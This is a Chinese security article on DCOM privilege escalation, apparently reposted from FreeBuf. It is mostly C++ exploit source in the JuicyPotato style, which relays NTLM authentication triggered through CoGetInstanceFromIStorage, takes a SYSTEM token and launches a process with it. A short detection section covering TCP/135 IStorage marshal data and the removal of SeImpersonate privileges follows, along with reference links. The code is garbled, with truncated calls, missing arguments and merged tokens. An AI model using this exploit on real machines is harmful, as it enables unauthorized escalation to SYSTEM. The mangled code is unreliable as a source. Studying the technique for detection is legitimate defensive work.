freebufATT strcpy(dcom_ip,"127.0.0.1"); //Fallback to default BITS CLSID if(olestr == NULL) olestr = L"{4991d34b-80a1-4291-83b6-3328366b9097}"; exit(Juicy(NULL,FALSE)); } int Juicy(wchar_t *clsid, BOOL brute) { PotatoAPI*test = new PotatoAPI(); test->startCOMListenerThread(); if(clsid != NULL) olestr = clsid; if(!TEST_mode) printf("Testing %S %S\n", olestr, g_port); test->startRPCConnectionThread(); //创建到本地rpc请求连接,在接收到DCOM发回的NTLM请求后,程序本身不构造NTLM响应,而 test->triggerDCOM(); //触发CoGetInstanceFromIStorage BOOLresult = false; intret = 0; while(true) { //重放NTLM获取令牌并创建新进程 if (test->negotiator->authResult != -1) { HANDLE hToken; TOKEN_PRIVILEGES tkp; SECURITY_DESCRIPTOR sdSecurityDescriptor; if (!TEST_mode) printf("\n[+] authresult %d\n",test->negotiator->authResult); fflush(stdout); // Get a token for this process. if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, //enable privileges EnablePriv(hToken, SE_IMPERSONATE_NAME); EnablePriv(hToken, SE_ASSIGNPRIMARYTOKEN_NAME); PTOKEN_TYPE ptg; DWORD dwl = 0; HANDLE hProcessToken; OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, QuerySecurityContextToken(test->negotiator->phContext, IsTokenSystem(elevated_token); if(TEST_mode) return 1; GetTokenInformation(elevated_token, TokenType, if (!dwl) printf("[-] Error getting token type: error code0x%lx\n", GetLastError()); result = DuplicateTokenEx(elevated_token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, GetTokenInformation(duped_token, TokenType, if (!dwl) printf("Error getting token type: error code0x%lx\n", GetLastError()); DWORD SessionId; PROCESS_INFORMATION pi; STARTUPINFO si; SECURITY_ATTRIBUTES sa; ZeroMemory( ZeroMemory( memset( si.cb = sizeof(STARTUPINFO); si.lpDesktop = L"winsta0\\default"; DWORD sessionId = WTSGetActiveConsoleSessionId(); fflush(stdout); wchar_tcommand[256]; wcscpy(command, processname); if (processargs != NULL) { wcsncat(command, L" ", 1); wcsncat(command, processargs, wcslen(processargs)); } if (*processtype == 't' || *processtype == '*') { //could be also the elevated_token result = CreateProcessWithTokenW(duped_token, 0, processname, command, 0, NULL, NULL, if (!result) { printf("\n[-] CreateProcessWithTokenW Failed to createproc: %d\n", GetLastError()) } else { printf("\n[+] CreateProcessWithTokenW OK\n"); break; } } if (*processtype == 'u' || *processtype == '*') { //could be also the elevated_token result= CreateProcessAsUserW( duped_token, processname, command, nullptr,nullptr, FALSE, 0, nullptr, L"C:\\", if (!result) { printf("\n[-] CreateProcessAsUser Failed to createproc: %d\n", GetLastError()) } else { printf("\n[+] CreateProcessAsUser OK\n"); break; } }//end argv if (!result) break; else { printf("Waiting for auth..."); Sleep(500); fflush(stdout); } }//end auth } return result; }
0×02 检测思路
CoGetInstanceFromIStorage函数本身在创建高权限DCOM对象后,解析IStorage参数.如果为一个地址.触发
ResolveOxid2(IObjectExporter模式)之前会默认使用NTLM认证.重放NTLM认证到本地或者反射回DCOM.这是整个 DCOM提权的攻击链条,在网络中检测TCP/135流量,识别IRemoteSCMActivator RPC接口的IStorage参数,一定会使用marshaldata,包含了标准列集01,handle列集02,自定义列集04等.如果是一个IP地址即列为告警.
或者去除危险进程使用账户的SeImpersonate或者SeAssignPrimaryToken权限
0×03 参考链接
https://bugs.chromium.org/p/project-zero/issues/detail?id=325&redir=1
https://silentbreaksecurity.com/exploiting-ms15-076-cve-2015-2370/ -ms15-076-cve-2015-2370/
https://github.com/foxglovesec/RottenPotato (ATT&CK T1171)
https://www.freebuf.com/column/181549.html
https://foxglovesecurity.com/2016 potato-privilege-escalation-from-service-accounts-to-system/
转载请注明来自网盾网络安全培训,本文标题:《ATT&CK攻击技术之DCOM提权》
